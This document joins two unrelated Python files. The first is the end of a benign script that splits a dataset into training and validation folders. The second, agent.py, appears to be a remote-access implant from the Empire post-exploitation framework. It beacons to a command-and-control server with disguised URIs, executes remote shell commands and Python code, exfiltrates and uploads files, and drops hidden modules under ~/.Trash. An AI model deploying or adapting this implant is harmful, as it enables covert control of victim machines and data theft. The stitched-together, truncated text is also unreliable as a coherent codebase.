global do_symlink
do_symlink = not do_symlink
return False
# Sets the duplicate threshold.
def arg_duplicate_amount(next_arg):
global class_duplicate_amount
try:
class_duplicate_amount = int(next_arg)
except:
stop('Invalid command line argument passed for duplicating amount.')
return True
# Sets the duplicating threshold.
def arg_exclude_amount(next_arg):
global class_exclude_amount
try:
class_exclude_amount = int(next_arg)
except:
stop('Invalid command line argument passed for exclusion amount.')
return True
# Flips value in 'calculate_threshold_automatically'.
def arg_calculate_threshold(next_arg):
global calculate_threshold_automatically
calculate_threshold_automatically = not calculate_threshold_automatically
return False
# Sets a name for the output categories
def arg_category(next_arg):
global categories
categories = next_arg.split(',')
return True
# Dict mapping the short forms of flags to the long ones.
char_arg_map = {
# Short form | Long form
'C': 'calculate-thresholds',
'e': 'exclude',
'D': 'duplicate',
'r': 'ratio',
's': 'source',
'd': 'destination',
'S': 'symlink',
'c': 'categories',
'h': 'help'}
# Maps the long name of a flag to a argument function
arg_dict = {
# Key | Function
'calculate-thresholds': arg_calculate_threshold,
'exclude': arg_exclude_amount,
'duplicate': arg_duplicate_amount,
'ratio': arg_ratio,
'source': arg_source,
'destination': arg_destination,
'symlink': arg_symlink,
'categories': arg_category,
'help': arg_help, }
# Converts single char arguments into a full argument and calls
# the processing function.
def process_1char_arg(char, next_arg):
try:
# return process_arg(char_arg_map.get(char), next_arg)
return arg_dict[char_arg_map[char]](next_arg)
except Exception as e:
log(f'\nInvalid single dash argument was given:\n\t{e}', 'error')
# Process command line arguments args
def process_commands():
if len(sys.argv) <= 0:
return
# Set to True when flag that requires aditional argument after
skip = False
for arg in range(len(sys.argv)):
skip = False
if skip:
continue
if (sys.argv[arg][0] == '-'):
next_arg = ''
if len(sys.argv) + 1 >= arg:
try:
next_arg = sys.argv[arg + 1]
except:
pass
# Handeling 'one dash per onle letter' syntax.
# This will permit passing one aditional parameter
if len(sys.argv[arg]) == 2:
skip = process_1char_arg(sys.argv[arg][1], next_arg)
# Long arguments
elif len(sys.argv[arg]) > 3:
# Handeling 'double dash, whole word! syntax.
# This will permit passing aditional parameters
if sys.argv[arg][1] == '-':
skip = arg_dict[sys.argv[arg][2:]](next_arg)
else:
# Consider the possibility of a default argument
pass
'''
# This function prompts the user for setting up individual values.
def prompt(ratio=None, source=None, destination=None):
# Getting the ratio
if ratio == None:
temp = input('Input ratio [TRAINING, VALIDATION]: ')\
.replace(' ', '').split(',')
ratio = []
for i in temp:
try:
ratio.append(float(i))
except:
log('Not a FLOAT!', 'error')
ratio = None
if len(ratio) != len(categories) or len(ratio) != len(categories)-1:
ratio = None
else:
log('all fine', 'warning')
# If the input has a wrong format.
if ratio == None:
log('Too few arguments or wrong formating!', 'error')
# Recursively call this function to get a new input.
return prompt(ratio, source, destination)
# Getting the source path.
if source == None:
source = pathlib.Path(input('Path to the source dir: '))
if not os.path.isdir(source):
source = None
return prompt(ratio, source, destination)
# Getting the destination path.
if destination == None:
destination = pathlib.Path(input('Path to the destination dir: '))
if not os.path.isdir(source):
source = None
return prompt(ratio, source, destination)
return ratio, source, destination
'''
# Checks if the values in the config file make sense.
def check_validity_of_configuration():
global ratio, source, destination
# Calculating the last number of the ratio, in case the user was lazy.
if len(ratio) == len(categories) - 1:
ratio.append(1-sum(ratio))
elif len(ratio) != len(categories):
stop('Mismatch between the amount of categories and ratio')
if source == None:
stop('Default source path is not set (use -h for help).')
elif type(source) == str:
source = pathlib.Path(source)
if destination == None:
stop('Default destination path is not set (use -h for help).')
elif type(destination) == str:
destination = pathlib.Path(destination)
def log_info():
log(f'Sourcing dataset from {os.path.abspath(source)}.')
log(f'Makeing a new {"linked" if do_symlink else "copying"} dataset at '
+ f'{os.path.abspath(destination)}.')
log('', start='', hide_box=True)
log(f'The dataset will be split according to the following:')
for i, category in enumerate(categories):
log(f'{i}. {category}:\t{ratio[i]}')
log('', start='', hide_box=True)
# Explores the direcotries and maps the file tree.
def map_dir():
global source_dirs, source_files, source, sub_acc, sub_avg, \
calculate_threshold_automatically, class_duplicate_amount, \
class_exclude_amount
# Obtain directory listing.
source_dirs = os.listdir(source)
new_source_dirs = []
# Puts all files into a table 'source_files'.
dir_pointer = -1
for i in range(len(source_dirs)):
# Making sure all the 'file objects' lead to a dir and not some random
# file in the 'source' dir.
if os.path.isdir(source.joinpath(source_dirs[i])):
# Adding a new list for each subdir that will contain it's files.
temp_source_files = []
dir_pointer += 1
# At the same time I am building a new source dir list, that
# only contains actual directories. It's indexes will match the
# the 'source_files' table.
for j in os.listdir(source.joinpath(source_dirs[i])):
# Making sure only files get added this time.
if os.path.isfile(source.joinpath(source_dirs[i]).joinpath(j)):
temp_source_files.append(j)
# Actually adding the dir & files only when there are files in it.
if len(temp_source_files) != 0:
source_files.append(temp_source_files)
new_source_dirs.append(source_dirs[i])
# Quit if there are classes directories to work with.
if len(new_source_dirs) == 0:
stop('The source directory contains no subdirectories.')
source_dirs = new_source_dirs
# Calculeting the total amount of files
total_sum = 0
for i, directories in enumerate(source_dirs):
total_sum += len(source_files[i])
average = total_sum / len(source_files)
# Automatic calculation of the thresholds for duplicating and excluding
# dataset classes based on the amount of samples provided.
if calculate_threshold_automatically:
if class_duplicate_amount == 0:
class_duplicate_amount = total_sum / len(source_files)
if class_exclude_amount == 0:
class_exclude_amount = class_duplicate_amount/3*2
# Comunicating the information about the thresholds.
log(
f'The thresholds have been '
+ f'{"calculated" if calculate_threshold_automatically else "set"}'
+ ' to the following:')
log(f'Threshold for duplicating dataset is {class_duplicate_amount}.')
log(f'Threshold for excluding dataset is {class_exclude_amount}.')
# Computing the multiplier of amounts of files needed to transfer for
# every class # according to the thresholds.
for i, direcotries in enumerate(source_dirs):
if class_exclude_amount != 0 \
and len(source_files[i]) < class_exclude_amount:
sub_acc.append(i)
amounts.append(0)
elif class_duplicate_amount != 0 \
and len(source_files[i]) < class_duplicate_amount:
sub_avg.append(i)
amounts.append(class_duplicate_amount / len(source_files[i]))
else:
amounts.append(1)
# Creates direcory structure at the new location.
def make_dirs(destination, dir_list):
log('Creating directory structure.')
# Creating the root directory of the dataset.
try:
os.mkdir(destination)
log('Destination directory created.')
except FileExistsError:
pass
for i in dir_list:
try:
os.mkdir(destination.joinpath(i))
except FileExistsError:
pass
except Exception:
stop(f'Couldn\'t create directory for {i}!')
# Making dirs for the individual classes.
for index, directory in enumerate(source_dirs):
# Skip excluded datasets.
if index in sub_acc:
continue
# Creating the class direcotories.
try:
os.mkdir(destination.joinpath(i).joinpath(directory))
except FileExistsError:
pass
except Exception:
stop(f'Couldn\'t create directory for {directory} in {i}!')
# Forwards creating a single file to the appropriate function.
def create(src, dest):
if do_symlink:
# Create a symbolic link
try:
os.symlink(os.path.abspath(src), dest)
except FileExistsError as e:
pass
except OSError as e:
stop(f'An OS error has occurred: "{e}." !')
else:
# Make a copy of the file
try:
copyfile(src, dest)
except FileExistsError as e:
log(f'Cannot copy file {src}.', 'error')
# Populates a single dir with samples.
def make_dataset_dirs(path, destination_name, occurred, index, amount):
global progress_file
progress = 0
while True:
for i in range(occurred[0], occurred[1]):
if progress >= amount:
return
create(
path.joinpath(source_files[index][i]),
destination.joinpath(destination_name, source_dirs[index],
f'{progress}-{source_files[index][i]}'))
progress_file += 1
progress += 1
# Initiates the population of all dirs of a one class with samples.
def make_dataset(index):
global ratio
dataset_path_src = source.joinpath(source_dirs[index])
ranges = [0]
# Computes the real ranges based on the amount of samples and ratio.
for i, value in enumerate(ratio):
# log(f'randomass var: {value}', 'error')
ranges.append(
ranges[len(ranges)-1] + int(len(source_files[index]) * value))
make_dataset_dirs(
dataset_path_src, categories[i], [ranges[i], ranges[i+1]],
index, (ranges[i+1] - ranges[i]) * amounts[index])
# Prints a list of the classes with the amounts of samples and their standing
# according to the threshold.
def print_dirs():
global class_duplicate_amount, class_exclude_amount
total_sum = 0
for i, dir in enumerate(source_dirs):
total_sum += len(source_files[i])
average = total_sum / len(source_files)
log(f'The average amount of files is {int(average)}.\n')
log(f'List of directories:\n\t', end='')
for i, dir in enumerate(source_dirs):
log(f'{dir}\t\t\thas {len(source_files[i])} samples', end='')
if len(source_files[i]) < class_exclude_amount:
log(' (excluding)', start='', hide_box=True)
elif len(source_files[i]) < class_duplicate_amount:
log(' (duplicating)', start='', hide_box=True)
else:
log('', start='', hide_box=True)
log('', hide_box=True, end='\t')
log('\n' * 2, start='', end='', hide_box=True)
log(
f'There are {len(source_dirs)-len(sub_acc)-len(sub_avg)}'
+ ' heathy datasets.')
log(f'There are {len(sub_avg)} files that are bellow average.')
log(
f'There are {len(sub_acc)} files that have insufficient amount'
+ ' of samples.\n')
# A function that displays the progress bar and also prints some other things.
# It is meant to run in a separate thread.
def progress_bar():
dirs = len(source_dirs)
# Printing in Python is inconsistent when doing a lot of processing
# Therefore I have to print the directory listing in a separate thread.
files_total = 0
for i, obj in enumerate(source_files):
files_total += len(obj) * amounts[i]
log(f'Total files found: {files_total}.')
log('\n', start='', hide_box=True)
# Showing and updating the progress bar.
while not thread_stop:
# Computing the current percentage of progress.
percentage_class = float(progress_class) / len(source_files) * 100
percentage_file = float(progress_file) / files_total * 100
log(
f'{"Linking" if do_symlink else "Copying"} new dataset'
+ f' structure at {destination}')
# Preparing the string that will be printed.
string = f'\t[~] Class progress\t[{"█" * (int(percentage_class))}'\
+ f'{" " * (100 - int(percentage_class))}]'\
+ f'{int(percentage_class)}%'\
+ f' - {int(progress_class)}/{len(source_files)}'\
+ f' ({source_dirs[progress_class-1]})\n'
string += f'\t[~] File progress\t[{"█" * (int(percentage_file))}'\
+ f'{" " * (100 - int(percentage_file))}]'\
+ f'{int(percentage_file)}% -'\
+ f' {int(progress_file)}/{files_total}\n'
log(string, end='', start='', hide_box=True)
# Giving the CPU a break before redrawing.
time.sleep(0.01)
# Putting the cursor three lines up.
sys.stdout.write("\033[F" * 3)
log(f'Finished formating dataset at \'{os.path.abspath(destination)}\'.'
+ ' '*20)
def main():
global source_dirs, progress_class, thread_stop
# Processes command line arguments.
process_commands()
# Making sure all the config makes sense.
check_validity_of_configuration()
# Greeter banner.
banner()
# Printing a summary of configuration.
log_info()
# Mapping files structure of the source dir.
log('Mapping directories...\n')
map_dir()
# Prints all the directories with the amount of samples in them.
print_dirs()
# Display the progress bar.
prog_bar = threading.Thread(target=progress_bar)
prog_bar.start()
# Create the directory structure.
make_dirs(destination, categories)
# Copy files into the new dirs.
for i in range(len(source_dirs)):
make_dataset(i)
progress_class += 1
# Stopping the progress bar.
thread_stop = True
prog_bar.join()
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
stop('A KEYBOARD INTERRUPTION')
|
agent.py
|
import struct
import base64
import subprocess
import random
import time
import datetime
import os
import sys
import zlib
import threading
import http.server
import zipfile
import io
import importlib.util
import types
import re
import shutil
import pwd
import socket
import math
import stat
import grp
import numbers
from os.path import expanduser
from io import StringIO
from threading import Thread
################################################
#
# agent configuration information
#
################################################
# print "starting agent"
# profile format ->
# tasking uris | user agent | additional header 1 | additional header 2 | ...
profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
if server.endswith("/"): server = server[0:-1]
delay = 60
jitter = 0.0
lostLimit = 60
missedCheckins = 0
jobMessageBuffer = ''
currentListenerName = ""
sendMsgFuncCode = ""
# killDate form -> "MO/DAY/YEAR"
killDate = 'REPLACE_KILLDATE'
# workingHours form -> "9:00-17:00"
workingHours = 'REPLACE_WORKINGHOURS'
parts = profile.split('|')
taskURIs = parts[0].split(',')
userAgent = parts[1]
headersRaw = parts[2:]
defaultResponse = base64.b64decode("")
jobs = []
moduleRepo = {}
_meta_cache = {}
# global header dictionary
# sessionID is set by stager.py
# headers = {'User-Agent': userAgent, "Cookie": "SESSIONID=%s" %(sessionID)}
headers = {'User-Agent': userAgent}
# parse the headers into the global header dictionary
for headerRaw in headersRaw:
try:
headerKey = headerRaw.split(":")[0]
headerValue = headerRaw.split(":")[1]
if headerKey.lower() == "cookie":
headers['Cookie'] = "%s;%s" %(headers['Cookie'], headerValue)
else:
headers[headerKey] = headerValue
except:
pass
################################################
#
# communication methods
#
################################################
REPLACE_COMMS
################################################
#
# encryption methods
#
################################################
def decode_routing_packet(data):
"""
Parse ALL routing packets and only process the ones applicable
to this agent.
"""
# returns {sessionID : (language, meta, additional, [encData]), ...}
packets = parse_routing_packet(stagingKey, data)
for agentID, packet in packets.items():
if agentID == sessionID:
(language, meta, additional, encData) = packet
# if meta == 'SERVER_RESPONSE':
process_tasking(encData)
else:
# TODO: how to handle forwarding on other agent routing packets?
pass
def build_response_packet(taskingID, packetData, resultID=0):
"""
Build a task packet for an agent.
[2 bytes] - type
[2 bytes] - total # of packets
[2 bytes] - packet #
[2 bytes] - task/result ID
[4 bytes] - length
[X...] - result data
+------+--------------------+----------+---------+--------+-----------+
| Type | total # of packets | packet # | task ID | Length | task data |
+------+--------------------+--------------------+--------+-----------+
| 2 | 2 | 2 | 2 | 4 | <Length> |
+------+--------------------+----------+---------+--------+-----------+
"""
packetType = struct.pack('=H', taskingID)
totalPacket = struct.pack('=H', 1)
packetNum = struct.pack('=H', 1)
resultID = struct.pack('=H', resultID)
if packetData:
if(isinstance(packetData, str)):
packetData = base64.b64encode(packetData.encode('utf-8', 'ignore'))
else:
packetData = base64.b64encode(packetData.decode('utf-8').encode('utf-8','ignore'))
if len(packetData) % 4:
packetData += '=' * (4 - len(packetData) % 4)
length = struct.pack('=L',len(packetData))
return packetType + totalPacket + packetNum + resultID + length + packetData
else:
length = struct.pack('=L', 0)
return packetType + totalPacket + packetNum + resultID + length
def parse_task_packet(packet, offset=0):
"""
Parse a result packet-
[2 bytes] - type
[2 bytes] - total # of packets
[2 bytes] - packet #
[2 bytes] - task/result ID
[4 bytes] - length
[X...] - result data
+------+--------------------+----------+---------+--------+-----------+
| Type | total # of packets | packet # | task ID | Length | task data |
+------+--------------------+--------------------+--------+-----------+
| 2 | 2 | 2 | 2 | 4 | <Length> |
+------+--------------------+----------+---------+--------+-----------+
Returns a tuple with (responseName, length, data, remainingData)
Returns a tuple with (responseName, totalPackets, packetNum, resultID, length, data, remainingData)
"""
# print "parse_task_packet"
if(isinstance(packet, str)):
packet = packet.encode('UTF-8')
try:
packetType = struct.unpack('=H', packet[0+offset:2+offset])[0]
totalPacket = struct.unpack('=H', packet[2+offset:4+offset])[0]
packetNum = struct.unpack('=H', packet[4+offset:6+offset])[0]
resultID = struct.unpack('=H', packet[6+offset:8+offset])[0]
length = struct.unpack('=L', packet[8+offset:12+offset])[0]
packetData = packet[12+offset:12+offset+length]
remainingData = packet[12+offset+length:]
return (packetType, totalPacket, packetNum, resultID, length, packetData, remainingData)
except Exception as e:
print("parse_task_packet exception:",e)
return (None, None, None, None, None, None, None)
def process_tasking(data):
# processes an encrypted data packet
# -decrypts/verifies the response to get
# -extracts the packets and processes each
try:
# aes_decrypt_and_verify is in stager.py
tasking = aes_decrypt_and_verify(key, data)
(packetType, totalPacket, packetNum, resultID, length, data, remainingData) = parse_task_packet(tasking)
# if we get to this point, we have a legit tasking so reset missedCheckins
missedCheckins = 0
# execute/process the packets and get any response
resultPackets = ""
result = process_packet(packetType, data, resultID)
if result:
resultPackets += result
packetOffset = 12 + length
while remainingData and remainingData != '':
(packetType, totalPacket, packetNum, resultID, length, data, remainingData) = parse_task_packet(tasking, offset=packetOffset)
result = process_packet(packetType, data, resultID)
if result:
resultPackets += result
packetOffset += 12 + length
# send_message() is patched in from the listener module
send_message(resultPackets)
except Exception as e:
# print "processTasking exception:",e
pass
def process_job_tasking(result):
# process job data packets
# - returns to the C2
# execute/process the packets and get any response
try:
resultPackets = ""
if result:
resultPackets += result
# send packets
send_message(resultPackets)
except Exception as e:
print("processJobTasking exception:",e)
pass
def process_packet(packetType, data, resultID):
if(isinstance(data, bytes)):
data = data.decode('UTF-8')
try:
packetType = int(packetType)
except Exception as e:
return None
if packetType == 1:
# sysinfo request
# get_sysinfo should be exposed from stager.py
send_message(build_response_packet(1, get_sysinfo(), resultID))
elif packetType == 2:
# agent exit
send_message(build_response_packet(2, "", resultID))
agent_exit()
elif packetType == 40:
# run a command
parts = data.split(" ")
if len(parts) == 1:
data = parts[0]
resultData = str(run_command(data))
send_message(build_response_packet(40, resultData + "\r\n ..Command execution completed.", resultID))
else:
cmd = parts[0]
cmdargs = ' '.join(parts[1:len(parts)])
resultData = str(run_command(cmd, cmdargs=cmdargs))
send_message(build_response_packet(40, resultData + "\r\n ..Command execution completed.", resultID))
elif packetType == 41:
# file download
objPath = os.path.abspath(data)
fileList = []
if not os.path.exists(objPath):
send_message(build_response_packet(40, "file does not exist or cannot be accessed", resultID))
if not os.path.isdir(objPath):
fileList.append(objPath)
else:
# recursive dir listing
for folder, subs, files in os.walk(objPath):
for filename in files:
#dont care about symlinks
if os.path.exists(objPath):
fileList.append(objPath + "/" + filename)
for filePath in fileList:
offset = 0
size = os.path.getsize(filePath)
partIndex = 0
while True:
# get 512kb of the given file starting at the specified offset
encodedPart = get_file_part(filePath, offset=offset, base64=False)
c = compress()
start_crc32 = c.crc32_data(encodedPart)
comp_data = c.comp_data(encodedPart)
encodedPart = c.build_header(comp_data, start_crc32)
encodedPart = base64.b64encode(encodedPart).decode('UTF-8')
partData = "%s|%s|%s|%s" %(partIndex, filePath, size, encodedPart)
if not encodedPart or encodedPart == '' or len(encodedPart) == 16:
break
send_message(build_response_packet(41, partData, resultID))
global delay
global jitter
if jitter < 0: jitter = -jitter
if jitter > 1: jitter = old_div(1,jitter)
minSleep = int((1.0-jitter)*delay)
maxSleep = int((1.0+jitter)*delay)
sleepTime = random.randint(minSleep, maxSleep)
time.sleep(sleepTime)
partIndex += 1
offset += 512000
elif packetType == 42:
# file upload
try:
parts = data.split("|")
filePath = parts[0]
base64part = parts[1]
raw = base64.b64decode(base64part)
d = decompress()
dec_data = d.dec_data(raw, cheader=True)
if not dec_data['crc32_check']:
send_message(build_response_packet(0, "[!] WARNING: File upload failed crc32 check during decompressing!.", resultID))
send_message(build_response_packet(0, "[!] HEADER: Start crc32: %s -- Received crc32: %s -- Crc32 pass: %s!." %(dec_data['header_crc32'],dec_data['dec_crc32'],dec_data['crc32_check']), resultID))
f = open(filePath, 'ab')
f.write(dec_data['data'])
f.close()
send_message(build_response_packet(42, "[*] Upload of %s successful" %(filePath), resultID))
except Exception as e:
sendec_datadMessage(build_response_packet(0, "[!] Error in writing file %s during upload: %s" %(filePath, str(e)), resultID))
elif packetType == 50:
# return the currently running jobs
msg = ""
if len(jobs) == 0:
msg = "No active jobs"
else:
msg = "Active jobs:\n"
for x in range(len(jobs)):
msg += "\t%s" %(x)
send_message(build_response_packet(50, msg, resultID))
elif packetType == 51:
# stop and remove a specified job if it's running
try:
# Calling join first seems to hang
# result = jobs[int(data)].join()
send_message(build_response_packet(0, "[*] Attempting to stop job thread", resultID))
result = jobs[int(data)].kill()
send_message(build_response_packet(0, "[*] Job thread stoped!", resultID))
jobs[int(data)]._Thread__stop()
jobs.pop(int(data))
if result and result != "":
send_message(build_response_packet(51, result, resultID))
except:
return build_response_packet(0, "error stopping job: %s" %(data), resultID)
elif packetType == 100:
# dynamic code execution, wait for output, don't save outputPicl
try:
buffer = StringIO()
sys.stdout = buffer
code_obj = compile(data, '<string>', 'exec')
exec(code_obj, globals())
sys.stdout = sys.__stdout__
code_obj = compile(data, '<string>', 'exec')
exec(code_obj, globals())
results = buffer.getvalue()
send_message(build_response_packet(100, str(results), resultID))
except Exception as e:
errorData = str(buffer.getvalue())
return build_response_packet(0, "error executing specified Python data: %s \nBuffer data recovered:\n%s" %(e, errorData), resultID)
elif packetType == 101:
# dynamic code execution, wait for output, save output
prefix = data[0:15].strip()
extension = data[15:20].strip()
data = data[20:]
try:
buffer = StringIO()
sys.stdout = buffer
code_obj = compile(data, '<string>', 'exec')
exec(code_obj, globals())
sys.stdout = sys.__stdout__
c = compress()
start_crc32 = c.crc32_data(buffer.getvalue())
comp_data = c.comp_data(buffer.getvalue())
encodedPart = c.build_header(comp_data, start_crc32)
encodedPart = base64.b64encode(encodedPart)
send_message(build_response_packet(101, '{0: <15}'.format(prefix) + '{0: <5}'.format(extension) + encodedPart, resultID))
except Exception as e:
# Also return partial code that has been executed
errorData = str(buffer.getvalue())
send_message(build_response_packet(0, "error executing specified Python data %s \nBuffer data recovered:\n%s" %(e, errorData), resultID))
elif packetType == 102:
# on disk code execution for modules that require multiprocessing not supported by exec
try:
implantHome = expanduser("~") + '/.Trash/'
moduleName = ".mac-debug-data"
implantPath = implantHome + moduleName
result = "[*] Module disk path: %s \n" %(implantPath)
with open(implantPath, 'w') as f:
f.write(data)
result += "[*] Module properly dropped to disk \n"
pythonCommand = "python %s" %(implantPath)
process = subprocess.Popen(pythonCommand, stdout=subprocess.PIPE, shell=True)
data = process.communicate()
result += data[0].strip()
try:
os.remove(implantPath)
result += "\n[*] Module path was properly removed: %s" %(implantPath)
except Exception as e:
print("error removing module filed: %s" %(e))
fileCheck = os.path.isfile(implantPath)
if fileCheck:
result += "\n\nError removing module file, please verify path: " + str(implantPath)
send_message(build_response_packet(100, str(result), resultID))
except Exception as e:
fileCheck = os.path.isfile(implantPath)
if fileCheck:
send_message(build_response_packet(0, "error executing specified Python data: %s \nError removing module file, please verify path: %s" %(e, implantPath), resultID))
send_message(build_response_packet(0, "error executing specified Python data: %s" %(e), resultID))
elif packetType == 110:
start_job(data)
send(build_response_packet(110, "job %s started" %(len(jobs)-1), resultID))
elif packetType == 111:
# TASK_CMD_JOB_SAVE
# TODO: implement job structure
pass
elif packetType == 121:
#base64 decode the script and execute
script = base64.b64decode(data)
try:
buffer = StringIO()
sys.stdout = buffer
code_obj = compile(script, '<string>', 'exec')
exec(code_obj, globals())
sys.stdout = sys.__stdout__
result = str(buffer.getvalue())
send_message(build_response_packet(121, result, resultID))
except Exception as e:
errorData = str(buffer.getvalue())
send_message(build_response_packet(0, "error executing specified Python data %s \nBuffer data recovered:\n%s" %(e, errorData), resultID))
elif packetType == 122:
#base64 decode and decompress the data
try:
parts = data.split('|')
base64part = parts[1]
fileName = parts[0]
raw = base64.b64decode(base64part)
d = decompress()
dec_data = d.dec_data(raw, cheader=True)
if not dec_data['crc32_check']:
send_message(build_response_packet(122, "Failed crc32_check during decompression", resultID))
except Exception as e:
send_message(build_response_packet(122, "Unable to decompress zip file: %s" % (e), resultID))
zdata = dec_data['data']
zf = zipfile.ZipFile(io.BytesIO(zdata), "r")
if fileName in list(moduleRepo.keys()):
send_message(build_response_packet(122, "%s module already exists" % (fileName), resultID))
else:
moduleRepo[fileName] = zf
install_hook(fileName)
send_message(build_response_packet(122, "Successfully imported %s" % (fileName), resultID))
elif packetType == 123:
#view loaded modules
repoName = data
if repoName == "":
loadedModules = "\nAll Repos\n"
for key, value in list(moduleRepo.items()):
loadedModules += "\n----"+key+"----\n"
loadedModules += '\n'.join(moduleRepo[key].namelist())
send_message(build_response_packet(123, loadedModules, resultID))
else:
try:
loadedModules = "\n----"+repoName+"----\n"
loadedModules += '\n'.join(moduleRepo[repoName].namelist())
send_message(build_response_packet(123, loadedModules, resultID))
except Exception as e:
msg = "Unable to retrieve repo contents: %s" % (str(e))
send_message(build_response_packet(123, msg, resultID))
elif packetType == 124:
#remove module
repoName = data
try:
remove_hook(repoName)
del moduleRepo[repoName]
send_message(build_response_packet(124, "Successfully remove repo: %s" % (repoName), resultID))
except Exception as e:
send_message(build_response_packet(124, "Unable to remove repo: %s, %s" % (repoName, str(e)), resultID))
else:
send_message(build_response_packet(0, "invalid tasking ID: %s" %(taskingID), resultID))
def old_div(a, b):
"""
Equivalent to ``a / b`` on Python 2 without ``from __future__ import
division``.
"""
if isinstance(a, numbers.Integral) and isinstance(b, numbers.Integral):
return a // b
else:
return a / b
################################################
#
# Custom Import Hook
# #adapted from https://github.com/sulinx/remote_importer
#
################################################
# [0] = .py ext, is_package = False
# [1] = /__init__.py ext, is_package = True
_search_order = [('.py', False), ('/__init__.py', True)]
class ZipImportError(ImportError):
"""Exception raised by zipimporter objects."""
# _get_info() = takes the fullname, then subpackage name (if applicable),
# and searches for the respective module or package
class CFinder(object):
"""Import Hook for Empire"""
def __init__(self, repoName):
self.repoName = repoName
def _get_info(self, repoName, fullname):
"""Search for the respective package or module in the zipfile object"""
parts = fullname.split('.')
submodule = parts[-1]
modulepath = '/'.join(parts)
#check to see if that specific module exists
for suffix, is_package in _search_order:
relpath = modulepath + suffix
try:
moduleRepo[repoName].getinfo(relpath)
except KeyError:
pass
else:
return submodule, is_package, relpath
#Error out if we can find the module/package
msg = ('Unable to locate module %s in the %s repo' % (submodule, repoName))
raise ZipImportError(msg)
def _get_source(self, repoName, fullname):
"""Get the source code for the requested module"""
submodule, is_package, relpath = self._get_info(repoName, fullname)
fullpath = '%s/%s' % (repoName, relpath)
source = moduleRepo[repoName].read(relpath)
source = source.replace('\r\n', '\n')
source = source.replace('\r', '\n')
return submodule, is_package, fullpath, source
def find_module(self, fullname, path=None):
try:
submodule, is_package, relpath = self._get_info(self.repoName, fullname)
except ImportError:
return None
else:
return self
def load_module(self, fullname):
submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)
code = compile(source, fullpath, 'exec')
mod = sys.modules.setdefault(fullname, types.ModuleType(fullname))
mod.__loader__ = self
mod.__file__ = fullpath
mod.__name__ = fullname
if is_package:
mod.__path__ = [os.path.dirname(mod.__file__)]
exec(code, mod.__dict__)
return mod
def get_data(self, fullpath):
prefix = os.path.join(self.repoName, '')
if not fullpath.startswith(prefix):
raise IOError('Path %r does not start with module name %r', (fullpath, prefix))
relpath = fullpath[len(prefix):]
try:
return moduleRepo[self.repoName].read(relpath)
except KeyError:
raise IOError('Path %r not found in repo %r' % (relpath, self.repoName))
def is_package(self, fullname):
"""Return if the module is a package"""
submodule, is_package, relpath = self._get_info(self.repoName, fullname)
return is_package
def get_code(self, fullname):
submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)
return compile(source, fullpath, 'exec')
def install_hook(repoName):
if repoName not in _meta_cache:
finder = CFinder(repoName)
_meta_cache[repoName] = finder
sys.meta_path.append(finder)
def remove_hook(repoName):
if repoName in _meta_cache:
finder = _meta_cache.pop(repoName)
sys.meta_path.remove(finder)
################################################
#
# misc methods
#
################################################
class compress(object):
'''
Base clase for init of the package. This will handle
the initial object creation for conducting basic functions.
'''
CRC_HSIZE = 4
COMP_RATIO = 9
def __init__(self, verbose=False):
"""
Populates init.
"""
pass
def comp_data(self, data, cvalue=COMP_RATIO):
'''
Takes in a string and computes
the comp obj.
data = string wanting compression
cvalue = 0-9 comp value (default 6)
'''
cdata = zlib.compress(data,cvalue)
return cdata
def crc32_data(self, data):
'''
Takes in a string and computes crc32 value.
data = string before compression
returns:
HEX bytes of data
'''
crc = zlib.crc32(data) & 0xFFFFFFFF
return crc
def build_header(self, data, crc):
'''
Takes comp data, org crc32 value,
and adds self header.
data = comp data
crc = crc32 value
'''
header = struct.pack("!I",crc)
built_data = header + data
return built_data
class decompress(object):
'''
Base clase for init of the package. This will handle
the initial object creation for conducting basic functions.
'''
CRC_HSIZE = 4
COMP_RATIO = 9
def __init__(self, verbose=False):
"""
Populates init.
"""
pass
def dec_data(self, data, cheader=True):
'''
Takes:
Custom / standard header data
data = comp data with zlib header
BOOL cheader = passing custom crc32 header
returns:
dict with crc32 cheack and dec data string
ex. {"crc32" : true, "dec_data" : "-SNIP-"}
'''
if cheader:
comp_crc32 = struct.unpack("!I", data[:self.CRC_HSIZE])[0]
dec_data = zlib.decompress(data[self.CRC_HSIZE:])
dec_crc32 = zlib.crc32(dec_data) & 0xFFFFFFFF
if comp_crc32 == dec_crc32:
crc32 = True
else:
crc32 = False
return { "header_crc32" : comp_crc32, "dec_crc32" : dec_crc32, "crc32_check" : crc32, "data" : dec_data }
else:
dec_data = zlib.decompress(data)
return dec_data
def agent_exit():
# exit for proper job / thread cleanup
if len(jobs) > 0:
try:
for x in jobs:
jobs[int(x)].kill()
jobs.pop(x)
except:
# die hard if thread kill fails
pass
exit()
def indent(lines, amount=4, ch=' '):
padding = amount * ch
return padding + ('\n'+padding).join(lines.split('\n'))
# from http://stackoverflow.com/questions/6893968/how-to-get-the-return-value-from-a-thread-in-python
class ThreadWithReturnValue(Thread):
def __init__(self, group=None, target=None, name=None,
args=(), kwargs={}, Verbose=None):
Thread.__init__(self, group, target, name, args, kwargs, Verbose)
self._return = None
def run(self):
if self._Thread__target is not None:
self._return = self._Thread__target(*self._Thread__args,
**self._Thread__kwargs)
def join(self):
Thread.join(self)
return self._return
class KThread(threading.Thread):
"""A subclass of threading.Thread, with a kill()
method."""
def __init__(self, *args, **keywords):
threading.Thread.__init__(self, *args, **keywords)
self.killed = False
def start(self):
"""Start the thread."""
self.__run_backup = self.run
self.run = self.__run # Force the Thread toinstall our trace.
threading.Thread.start(self)
def __run(self):
"""Hacked run function, which installs the
trace."""
sys.settrace(self.globaltrace)
self.__run_backup()
self.run = self.__run_backup
def globaltrace(self, frame, why, arg):
if why == 'call':
return self.localtrace
else:
return None
def localtrace(self, frame, why, arg):
if self.killed:
if why == 'line':
raise SystemExit()
return self.localtrace
def kill(self):
self.killed = True
def start_job(code):
global jobs
# create a new code block with a defined method name
codeBlock = "def method():\n" + indent(code)
# register the code block
code_obj = compile(codeBlock, '<string>', 'exec')
# code needs to be in the global listing
# not the locals() scope
exec(code_obj, globals())
# create/processPacketstart/return the thread
# call the job_func so sys data can be cpatured
codeThread = KThread(target=job_func)
codeThread.start()
jobs.append(codeThread)
def job_func():
try:
old_stdout = sys.stdout
sys.stdout = mystdout = StringIO()
# now call the function required
# and capture the output via sys
method()
sys.stdout = old_stdout
dataStats_2 = mystdout.getvalue()
